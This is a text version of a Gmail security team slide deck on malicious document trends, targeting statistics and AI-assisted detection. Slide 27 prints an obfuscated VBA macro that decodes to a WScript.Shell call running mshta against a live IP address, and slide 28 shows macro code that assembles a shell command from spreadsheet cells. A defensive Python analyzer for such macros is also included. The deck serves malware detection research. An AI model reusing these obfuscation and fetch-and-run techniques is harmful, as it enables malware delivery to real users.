Malicious Documents Trends: a Gmail Perspective - Google, @elie - PowerPoint PPT Presentation



SLIDE 1

SESSION ID: HTA-T10

Malicious Documents Trends: a Gmail Perspective

Google, @elie with the help of many Googlers

SLIDE 2

Slides available here: https://elie.net/rsa20

SLIDE 3

https://www.anomali.com/files/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf

In Oct 2019 the Russian-sponsored APT group Primitive Bear used obfuscated Office documents to target Ukrainian entities

SLIDE 4

Office: 56% PDF: 2%

Malicious documents represent a significant part of the malware targeting our users

SLIDE 5

Every week Gmail scans over 300B+ attachments for malware

SLIDE 6

Each second we need to process millions of documents in a matter of milliseconds

SLIDE 7

How Gmail malware detection works

Scanners Decision engine Policy engine


SLIDE 11

How about users and organizations at risk of targeted attack?

SLIDE 12

Security sandboxes are used to supplement detection when needed.

SLIDE 13

Agenda

Who is targeted by malicious documents?

Deconstructing malicious document campaigns

Insights into Gmail next-gen detection

SLIDE 14

Who is targeted by malicious documents?

SLIDE 15

Every type of organization is at risk of being targeted by malicious documents

Education Company Not for profit Government

SLIDE 16

Education Company Not for profit Government

Some organizations are more targeted by malicious documents than others

SLIDE 17

Education Finance & Insurance Health Care IT Wholesale Trade Retail Real Estate Manufacturing Utilities Transportation

Some industries are more targeted by malicious documents than others

SLIDE 18

Prevalence of malicious documents varies drastically from country to country

Indonesia Russia Germany India Japan France USA Finland Great Britain Norway

SLIDE 19

Deconstructing malicious documents campaigns

SLIDE 20

2000 BCE 1200 CE 1800 CE 2020 CE

Cats through the ages

SLIDE 21

63% of the malicious docs blocked by Gmail are different from day to day

SLIDE 22

The volume of malicious documents varies greatly from day to day: a 3x variation is normal

SLIDE 23

Locky ransomware

Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was sending 100M Locky samples per day in 2016

SLIDE 24

The malicious document threat landscape is very fast-paced and extremely adversarial

SLIDE 25

Kits offering weaponized document exploits packed with AV evasion techniques are routinely available on the black market as SaaS for $400-$5000

https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728

SLIDE 26

What techniques do those kits use?

SLIDE 27

' Obfuscated macro shown on the slide: the command line and the "WScript.Shell"
' ProgID are rebuilt by replacing random junk tokens with single letters; the
' unused arithmetic and string concatenations are padding added to defeat
' signature matching.
boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbRQzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY"
boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m")
boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a")
dzkkGwK = "X" & "p" & "o"
boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s")
AuOKypAOxXWC = "u" & "x" & Trim("G")
LrdizVw = 1418 + 1239 + 1546 + 521 + 1029
iBEFgGzg = 1766 + 1267 + 544 + 1840
boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t")
boazuda = Replace(boazuda, "iELOZqbRQzjY", "e")
cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818
IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187
boazuda = Replace(boazuda, "dfnAfNznHxFV", "l")
yCdrQfLG = "Z" & "y" & Trim("R") & "d"
loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE"
loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m")
OFNCRKqKF = 1006 + 15 + 215
loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a")
TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716
loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s")
loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t")
QFMdIPpUYY = 459 - 943 - 977
AUvwcPXcwXb = "E" & "Q"
loquaz = Replace(loquaz, "wBfuroncKuUb", "e")
iqEyuLuf = "D" & "A" & Trim("O")
loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l")
uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I")
jXkIrzM = 128 - 1507 - 70
XjnfDLLd = Trim("k") & "o" & "p"
' loquaz now decodes to "WScript.Shell" and boazuda to the mshta command line
CreateObject(loquaz).Run boazuda, 0
FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245
NbnCVgoojDpO = 1069 + 1656 + 957 + 714
CDDQFoi = 512 + 1320
zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860

Decoded: Mshta http://104.144.xxx.yyy/tron/stem.php, launched via WScript.shell

SLIDE 28

Attackers try to evade detection by adding malware in XLS cell content.

' The command line is reassembled at runtime from spreadsheet cell contents
q = "": m = ""
For i = use * 2 To use * 2 + 3
    q = q + plumb(Cells(i, use * 2)): m = m + plumb(Cells(i + use / 2, use * 2))
Next i
Shell q + cop(use, use) + m, ..

SLIDE 29

Takeaways

63% of malware is different from day to day

Obfuscators and weaponized exploits are readily available

SLIDE 30

Insights into Gmail next-gen malicious document detection

SLIDE 31

Use AI to improve detection

SLIDE 32

Really?

SLIDE 33

Enhance existing detection capabilities with AI interpolation & advanced document analyzers to improve coverage and resilience to adversarial attacks

SLIDE 34

Gmail detection landscape: today

Chart labels: Detection TCO; Bulk malware; Advanced obfuscation; APT / 0day; Defense gap / opportunity

SLIDE 35

Gmail detection landscape: tomorrow

Chart labels: Detection TCO; Bulk malware; Advanced obfuscation; APT / 0day; AI

SLIDE 36

How does it work in practice?

SLIDE 37

Anatomy of a document scanner

Diagram components: Document analyzer; Macro/script parsers; Macro AST analyzer; Feature extractors; Machine learning; Transpiler; Supervised execution; Feedback loop for dynamic code (eval)
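To make the slide-27 obfuscation sample and the scanner anatomy above concrete, here is an added example (not Google's code, nor from the deck): a minimal static VBA string folder plus feature extractor, the kind of macro parser / AST-style analysis that feeds a classifier. The macro text, variable names, junk tokens and placeholder host are constructed in the style of the slide-27 sample.

```python
import re
# Constructed sample (not from the deck), in the style of the slide-27 macro; placeholder host.
SAMPLE_MACRO = """
boazuda = "zTpVrQWEzNChcjFYVDCLMq hcjFYVcjFYVp://example.invalid/WEzNCcjFYViELOZzTpVrQ.php"
boazuda = Replace(boazuda, "zTpVrQ", "m")
boazuda = Replace(boazuda, "DCLMq", "a")
dzkkGwK = "X" & "p" & "o"
boazuda = Replace(boazuda, "WEzNC", "s")
LrdizVw = 1418 + 1239 + 1546 + 521 + 1029
boazuda = Replace(boazuda, "cjFYV", "t")
boazuda = Replace(boazuda, "iELOZ", "e")
loquaz = "WScripUEAOX.ShwBfurkjJbOkjJbO"
loquaz = Replace(loquaz, "UEAOX", "t")
loquaz = Replace(loquaz, "wBfur", "e")
loquaz = Replace(loquaz, "kjJbO", "l")
CreateObject(loquaz).Run boazuda, 0
"""

ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
REPLACE_RE = re.compile(r'^\s*(\w+)\s*=\s*Replace\(\s*\1\s*,\s*"([^"]+)"\s*,\s*"([^"]*)"\s*\)\s*$')
LOLBINS = ("mshta", "wscript.shell", "powershell", "cmd.exe", "shell.application")

def fold_strings(macro):  # statically evaluate literal assignments and Replace() chains
    values = {}
    for line in macro.splitlines():
        if m := ASSIGN_RE.match(line):
            values[m.group(1)] = m.group(2)
        elif (m := REPLACE_RE.match(line)) and m.group(1) in values:
            values[m.group(1)] = values[m.group(1)].replace(m.group(2), m.group(3))
    return values

def dead_stores(macro):  # variables assigned but never read: obfuscator padding
    lines = [ln for ln in macro.splitlines() if ln.strip()]
    assigned = [m.group(1) for ln in lines if (m := re.match(r"^\s*(\w+)\s*=", ln))]
    used = set()
    for ln in lines:  # a variable is "read" if it appears anywhere outside an LHS
        used.update(re.findall(r"\w+", ln.split("=", 1)[1] if "=" in ln else ln))
    return [v for v in assigned if v not in used]

def extract_features(macro):  # feature vector for a classifier, plus decoded strings
    values = fold_strings(macro)
    lines = [ln for ln in macro.splitlines() if ln.strip()]
    decoded = " ".join(values.values()).lower()
    return {
        "replace_calls": sum(1 for ln in lines if REPLACE_RE.match(ln)),
        "dead_store_ratio": round(len(dead_stores(macro)) / len(lines), 2),
        "createobject_run": bool(re.search(r"CreateObject\(\w+\)\.Run\b", macro)),
        "decoded_lolbins": [k for k in LOLBINS if k in decoded],
        "decoded": values,
    }
```

The folded strings are what a detector should match on (mshta plus WScript.Shell here), while the Replace() count and dead-store ratio survive token re-randomization between campaigns.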

SLIDE 38

How our AI scanner integrates with Gmail malware detection

Scanners Policy engine Decision engine

SLIDE 39

Does it really work?

SLIDE 40

The AI scanner increases detection of malicious Office documents by ~10% consistently and by 150+% at peak

Chart: Jan 28 to Feb 24; series: AI only, Both, Other scanners only; y-axis 0% to 200%

SLIDE 41

Improvement varies by filetype (chart values: 10.5% and 14.5%)

SLIDE 42

How do you build ground truth?

SLIDE 43

Hindsight sample re-evaluation: re-scan documents at a later stage to give the various scanners a chance to have their false positives fixed

Additional sandbox scans: scan suspicious documents and a large subset of all documents with sandboxes for additional verdicts

Cluster analysis: leverage deep clustering to quickly identify the samples that need to be reviewed to find potential FPs / FNs

No silver bullet: use a multi-pronged approach

SLIDE 44

Deep-clustering to scale model improvements

Example of an incorrect extrapolation: ".dll" appearing in code was considered malicious

SLIDE 45

Takeaways

Malicious documents are a key threat to businesses and end users

Robust malicious document detection requires a defense-in-depth strategy that combines detection approaches

Adversaries continuously shift their TTPs and tweak their payloads to avoid detection

SLIDE 46

Robust malicious document detection requires combining technologies and constant R&D

https://elie.net/rsa20

SLIDE 47

Thank you